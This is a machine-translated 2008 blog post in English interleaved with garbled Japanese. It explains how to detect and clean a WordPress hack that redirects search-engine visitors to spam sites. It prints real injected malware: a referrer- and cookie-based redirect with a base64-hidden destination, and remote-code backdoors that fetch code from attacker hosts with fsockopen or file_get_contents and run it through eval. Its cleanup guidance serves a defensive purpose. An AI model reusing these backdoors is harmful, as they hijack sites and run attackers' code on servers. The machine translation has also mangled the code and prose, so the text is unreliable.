WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites WordPressの刻み目：回復すると修正、 Googleおよび検索エンジンやトラフィックのクッキーにリダイレクトさ- needs.infoして、 anyresults.net 、ゴールデン- info.netやその他の違法サイト

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads.ハッカーたちがやろうとしているすべてのホストWordPress Blogsの悪用ハックと、ウェブの、植栽や悪意のあるコードを注入するためにWordPressのコードとデータベースの訪問者をリダイレクトすると、 Googleや他の検索エンジンからの安打をマークしているサイトなど- needs.info 、 anyresults.net 、ゴールデン- info.net 、 keymachine.de 、 beliy.us 、マークseogoogle.usやその他多くのサイトで満ちているペイパークリック単価の広告をクリックします。 Some hack appears to target bigger crowd by redirecting all without WordPress cookie.いくつかの大きな群衆をターゲットに設定するハックが表示されたら、 WordPressのすべてのクッキーをリダイレクトします。 Without been hacked, these traffic supposedly to arrive at the blog as destination.切り刻まなく、これらのトラフィックを一応ブログとしては、目的地に到着します。

Symptoms of the Search Engine Redirection Hack の症状をハックには検索エンジンのリダイレクト

Note that not all symptoms may happen altogether.すべての症状に注意していない完全な事態が起こる場合です。 There may be more than one method of hacks existed, which contributed to different finding and possible resolution.れる場合がありますhacks 1つ以上のメソッドが存在、これに貢献し、また、可能性別の解決方法を見つける。

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow.任意のクリックしてGoogleなどの検索エンジンから、米ヤフー社、 AOLは、 MSNのと、 Windows Liveの検索結果は、ブログ名を含む、リダイレクトされるハッカーのサイトに転送されるなど、お客様- needs.info 、 anyresults.net 、黄金の情報をもっと見るです。当期純、 keymachine.de 、 beliy.us 、 seogoogle.us 、確実に成長のリストです。 Viewer arrives at the hacker page with the same search string that he or she used to search in search engine.ビューアは、ハッカーのページに到着して、同じ検索文字列を彼または彼女は、検索エンジンの使用して検索します。
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too.のリンクをクリックしてブログをRSSフィードリーダーのGoogleリーダーのようなハッカーのサイトにリダイレクトされることが判明しました。
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites.アカウントを訪問するブログがないか、または特定のログイン（したがってはありませんが悪意のあるコードを検出されたクッキー） 、マークのサイトにリダイレクトされています。
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem.検索エンジンからの訪問数のみがリダイレクトされていったが、ばかなまねをするのトリックに頼って、おそらく、多くのブロガー、ウェブマスターやサイトの所有者、または少なくとも検出の問題を先送りにする。
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact.突然の巨大で劇的なドロップして大量の観光客を失うの再生回数がウェブページのトラフィックやトラッカーの統計情報、特にリファラーのトラフィックと、 Googleとしてもかかわらず、検索エンジンの検索結果のランキングはそのままにします。
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions. massic Google AdSenseからの広告収入の減少や他の広告ネットワーク、またはアフィリエイト手数料です。
• The following base64 encoded PHP code may appear on the wp-blog-header.php file: base64でエンコードは、次のPHPコードが表示されるブログのWP - header.phpにファイル：

  <?php \ <ですか？ PHPの\
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ seref =アレイ（以下、 " Google " 、 " MSNの" 、 "ライブ" 、 "アルタビスタ" 、 "質問する" 、 "ヤフー" 、 " AOLの" 、 " CNNテレビ" 、 "天気予報" 、 " Alexaの" ） ;
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; } $サービス= 0 ; foreach （ $ serefとして$基準）の場合（ strpos （ strtolower （ $ _server [ ' http_referer ']),$リファレンス） ！ ==偽） （ $サービス= " 1ですか？ ;休憩; ）
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> もし（ $サービス== " 1ですか？ ＆ ＆ sizeof （ $ _COOKIEの） == 0 ） （ヘッダー（ "場所： http:// "で。 base64_decode （ " yw55cmvzdwx0cy5uzxq =")."/");出口; ）ですか？ >

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory.画像は、これは実際に一束の悪意のあるPHPコードが追加されましたwp-contents/uploadsディレクトリにコピーします。 For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, ie wp-contents/themes/classic/images/xyz.jpg.たとえば、 wp-contents/uploads/2008/06/06/abcdefghijklmn.jpgか、またはあなたのテーマフォルダ内かもしれない、すなわちwp-contents/themes/classic/images/xyz.jpgです。 The name of the image may be in the format of xxxxxx_old.jpeg.画像の名前を5月には、フォーマットxxxxxx_old.jpegです。
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8. MySQLデータベースのエントリはに挿入されwp_optionsを有効にするにはWordPressのイメージ（ 、悪意のあるPHPコード）プラグインとして、通常としてrss_f541b3abd05e7962fcab37737f40fad8です。
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files.悪意のあるコードれる場合がありますまた、特にその解釈にはeval （ ）またはbase64_decode （ ）コマンドでも挿入された他のWordPressのPHPファイルです。 Examples are the following codes:例としては、以下のコード：

  if(isset($_GET['p'])) { もし（ isset （ $ _get [ ' P 'を] ） ） （
$sock = @fsockopen(’km20725.keymachine.de’, 80); $靴下= @にfsockopen （ ' km20725.keymachine.de ' 、 80 ） ;
if($sock){ もし（ $ソックス） （
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”); fwrite （ $靴下、 '取得http://km20725.keymachine.de/server/index.php?host ='.$_サーバー[ 'サーバー'].'& p ='.$_取得[ ' P 'を] 。 'のHTTP / 1.0 ' 。 " \研究\ n " ） ;
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”); fwrite （ $靴下、 'ホスト： km20725.keymachine.de ' 。 " \研究\ n \研究\ n " ） ;
while($content[] = fgets ($sock)); 中（ $コンテンツ[ ] = fgets （ $ソックス） ） ;
$content = implode(”, $content); $コンテンツ= implode （ " 、 $コンテンツ） ;
@eval(trim(substr($content, strpos($content, “\r\n\r\n”)))); @ evalを（ trim （ substr （ $コンテンツ、 strpos （ $コンテンツ、 " \研究\ n \研究\ n "))));
fclose ($sock);} fclose （ $ソックス） ; ）
} ）

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); もし（ isset （ $ _get [ ' P 'を] ） ） （ @ eval （ @とfile （ ' http://beliy.us/server/index.php?host ='.$_サーバー[ 'サーバー'].'& p = ' 。 $ _get [ ' p ']));
} ）

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); もし（ isset （ $ _get [ ' P 'を] ） ） （ @ eval （ @とfile （ ' http://seogoogle.us/server/index.php?host ='.$_サーバー[ 'サーバー'].'& p = ' 。 $ _get [ ' p ']));
} ）

  eval(gzinflate(base64_decode( eval （取り除くgzinflate （ base64_decode （

• WordPress theme that is been activated and used can be injected with hacking code and affected too. WordPressのテーマに活性化され、使用されることはできるがハッキングに注入されたコードと影響を受けるが判明しました。 Such code normally exists in header.php or index.php of the theme, and has a line similar to the belowこのようなコードやindex.phpのheader.phpに存在し、通常のテーマと類似しては、下記の行には、

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: もし（ $サービス== " 1 " ＆ ＆ sizeof （ $ _COOKIEの） == 0 ） （ヘッダー（ "場所：

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some WordPressの検索トラフィックのマークのサイトにリダイレクトされるセキュリティホールのために、おそらくハックが起こるとされていない脆弱性のパッチを適用したときの所有者を決定しないようにブログの最新バージョンにアップグレードしてWordPressの（ただし、いくつかの reports報告書 that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1).ハッキングされていて、ブログにはもう上のWordPressの最新バージョン2.5.1 ） 。 Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages.原因が何であれ、ここは修正して、解決策を解決すると敗北ハックを確保するため、所有者であることを避けるために先頭のトラフィックとされ罰せられる理不尽なGoogleのリダイレクトをマークページをご覧ください。

1. Backup the WordPress database. WordPressのデータベースをバックアップします。
2. Use phpMyAdmin to browse WordPress MySQL database tables.使用phpMyAdminの MySQLデータベースのテーブルを参照するWordPressのです。 Go to wp_options table, and then edit the row named active_plugins . wp_optionsテーブルに行く、と入力し、名前の行を編集してactive_pluginsです。 The row details all active plugins that has been activated.すべてのアクティブなプラグインの行の詳細に活性化されてきた。 Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg.を経るのリスト（行） 、差込式の名前を探して終了すると、画像の拡張子のようなの。 jpg 、 。のJPEG 、 。 gifファイルなどたとえば、 abcdefgh_old.jpegです。 Note down the path to the image file.注：画像ファイルへのパスをダウンします。
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file.またはSSHを使用してSFTPは （ FTPやTelnetの安全保障を忘れる） 、入力しているファイルのパスに移動して、ファイルを削除してください。
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row. WordPressの管理者に行くの差込パネルで、任意のプラグインを有効にしてオフに停止またはオフ、悪意のあるプラグインからの" active_plugins "の行です。
5. Back to phpMyAdmin , at the wp_options table, find a row that contains the following string as option_name : phpMyAdminの省略して、 wp_optionsは、テーブルの行を見つけるには、以下の文字列としてoption_name ：

   rss_f541b3abd05e7962fcab37737f40fad8 rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away.行を削除してです。

   If you don’t know how to perform the database cleanup detailed in steps above, here’sa video tutorial:をお持ちでない場合、データベースのクリーンアップを行う方法を知って上記の手順を実行詳細は、以下のビデオチュートリアル：

6. Go to wp_users table.トップにwp_users表のとおりです。 If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00 , note down the user ID ( ID field, a number).がある場合は無名のユーザ（ user_nicenameフィールドにnull値） 00:00:00上に作成さ0000-00-00 、書きとめて、ユーザID （ 番号欄があるので、番号）です。 Delete the user.ユーザーを削除してください。
7. Browse the wp_usermeta table.参照してwp_usermeta表のとおりです。 Locate all rows with user_id matches the ID of the deleted illegal user. user_IDのすべての行を見つけ、違法にマッチするユーザーのIDを削除します。 There are normally three rows been associated to the invader user ID. 3つの行には、通常の侵入者に関連付けられているユーザIDが必要です。 Delete all the associated rows.関連付けられて行をすべて削除します。
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel.ログインするには、サーバーのテーマファイルを編集するか、またはファイルを参照してテーマ'のコードをテーマにデザインパネルエディタのWordPressの管理者です。 Check the header.php and index.php for any suspicious code. header.phpに 、 index.phpをチェックして、任意の不審なコードです。 As mentioned above, look for something similar to the line below:上述したように、何かに似ての行を探してください：

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: もし（ $サービス== " 1 " ＆ ＆ sizeof （ $ _COOKIEの） == 0 ） （ヘッダー（ "場所：

   If found, delete and remove the code.見つかった場合、削除してコードを削除してください。 Note that the malicious code will be several lines long in total.に注意して、悪意のあるコードが複数行に長い間の合計です。

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory.既に存在していない場合は、空のindex.htmlファイルを作成するのwp-contents/pluginsディレクトリにコピーします。 The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security. index.htmlを非表示にすると、空のプラグインディレクトリの内容を、どのようなプラグインを効果的にシールドされ、ハッカーを強化するとWordPressの安全保障を強化します。
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original一人一人のWordPressをアップロードして置き換えるファイル（特定のWP -ブログ- header.phpにのみ）を、サーバー上の新鮮な、清潔度、およびオリジナル latest version from WordPress最新のバージョンからのWordPress (of course, except few files such as wp-config.php and themes). （もちろん、いくつかのファイル以外のWP - config.phpをやテーマなど） 。 If you’re upgrading, read theアップグレードする場合は、下記の guideガイド carefully.注意が必要です。
11. Change your password.変更してパスワードを入力します。
12. If you have multiple users, change theirs password (or ask them to change the password) too.ユーザが複数存在する場合、かれらのパスワードを変更（またはパスワードを変更してもらうよう依頼して）が判明しました。

IMPORTANT : This is a machine translated page which is provided "as is" without warranty. 重要 ：これは、機械翻訳ページで提供"現状有姿"を保証します。 Machine translation may be difficult to understand.機械翻訳を理解するのは難しいかもしれません。 Please refer toを参照してください original English articleオリジナルの英語記事索引 whenever possible.いつ可能です。

Share and contribute or get technical support and help atを共有して貢献や技術サポートとヘルプを得る My Digital Life Forums 私のデジタルライフフォーラム .です。

Related Articles関連記事

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRankカートのnofollowの関係をWordPressの日BlogrollのPageRankを向上させる
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin差込式WordPress ：ディスプレイGoogle AnalyticsとFeedburnerの報告書の統計情報からサイト管理者
• Technorati Incoming Links Plugin for WordPress Technoratiの着信リンク差込式のWordPress
• A Glance At Google Merchant Search Googleの商人にチラッと目を検索
• How to Avoid, Bypass or Escape Google Sandboxどのようを避けるために、 Googleのサンドボックスをバイパスまたは脱出
• Ask.com Search Engine Review by CNNMoney検索エンジンの日をask.com cnnmoney
• Drive More Traffic by Using Imagesドライブのより多くのトラフィックを使用して画像
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folderソフレンドリー書き換えるメソッドのサブディレクトリに移動するウェブサイトのURLから親フォルダをルート
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template Google AdSenseの検索を統合し、ディスプレイと協同組合のカスタム検索エンジンの検索結果でのWordPress Blogページテンプレート
• Which Search Engine is the Best and Most Relevant?どの検索エンジンは、最高と最も関連性の高いですか？

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under このエントリが投稿は13日、 2008年6月10日に提出されて1:03 amとは Weblogs ウェブログ . です。 You can follow any responses to this entry through the 任意の応答をすることができます。このエントリは以下の RSS 2.0 RSS 2.0を feed. 食料。 You can することができます。 leave a response 応答を残す , or か、または trackback トラックバック from your own site. お客様ご自身のサイトからです。